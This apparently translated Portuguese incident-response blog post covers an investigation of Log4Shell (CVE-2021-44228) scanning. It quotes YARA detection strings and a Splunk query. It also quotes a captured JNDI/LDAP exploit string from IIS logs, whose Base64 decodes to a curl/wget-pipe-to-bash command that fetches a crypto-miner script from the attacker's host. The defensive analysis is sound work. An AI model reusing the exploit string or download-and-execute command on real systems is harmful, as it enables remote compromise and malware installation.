
CVE-2021-44228 DFIR Notas
Dirigindo para casa, recebi minhas primeiras mensagens sobre a vulnerabilidade #log4shell.
Uma vulnerabilidade de alta gravidade (CVE-2021-44228) que impacta várias versões do utilitário Apache Log4j 2 foi divulgada publicamente no GitHub do projeto em 9 de dezembro de 2021. Essa vulnerabilidade, descoberta por Chen Zhaojun da Alibaba Cloud Security Team, afeta as versões 2.0 a 2.14.1 do Apache Log4j 2.
Mergulhei de cabeça quando cheguei em casa. Splunk4tw como sempre.
Após a publicação do primeiro proof-of-concept exploit no GitHub, agentes de ameaças começaram a escanear a Internet em busca de sistemas vulneráveis a essa falha de segurança explorável remotamente, que não requer autenticação. O que você verá abaixo são parte desses escaneamentos e tentativas de exploração.
Meu primeiro passo é verificar se alguém já publicou uma regra YARA inicial. Encontrei aqui https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (Thx Florian Roth)
Ele menciona as seguintes strings de detecção:
strings:
$x1 = "${jndi:ldap:/"
$x2 = "${jndi:rmi:/"
$x3 = "${jndi:ldaps:/"
$x4 = "${jndi:dns:/"
Não estou com medo... vamos abusar de algumas CPUs e ir direto ao ataque com a pior pesquisa do Splunk.
index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")
Tenho alguns hits tanto nos meus logs do IIS quanto nos logs de eventos do Windows (redactados) e muitas tentativas bloqueadas nos logs do firewall....
IIS:

WINEVENTLOG:

Verificando o endereço IP 45.155.205.233.....São Petersburgo, Rússia.....que surpresa.

A string encontrada parece uma string maliciosa ofuscada e codificada, clássica de manual. Vamos ver o que ela faz:
Vamos decodificar a string Base64 usando o cyberchef
2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash
Curl...executar um script shell, bash....OMG. Estou começando a ter uma ideia do que essa peça desagradável fará....
Vamos executar o comando curl em uma sandbox:

368 linhas de código. (execute aqui se quiser ver o script completo --> https://reqbin.com/c-ipejxywd
Alguns trechos:

E depois que termina, até limpa os arquivos de log...que surpresa:

Basicamente, tenta instalar um malware chamado Kingsin, que é um minerador de criptomoedas. Os alvos são sistemas nix. Certifique-se de corrigir seus sistemas, pois o exploit será usado para executar todo tipo de payloads provavelmente.
Agradecimentos aos meus colegas Martijn da Umbrio e Rob [redacted] por uma sexta-feira à noite de debates no WhatsApp sobre isso. 00:09 hora de dormir.
#UPDATES & bons Recursos#
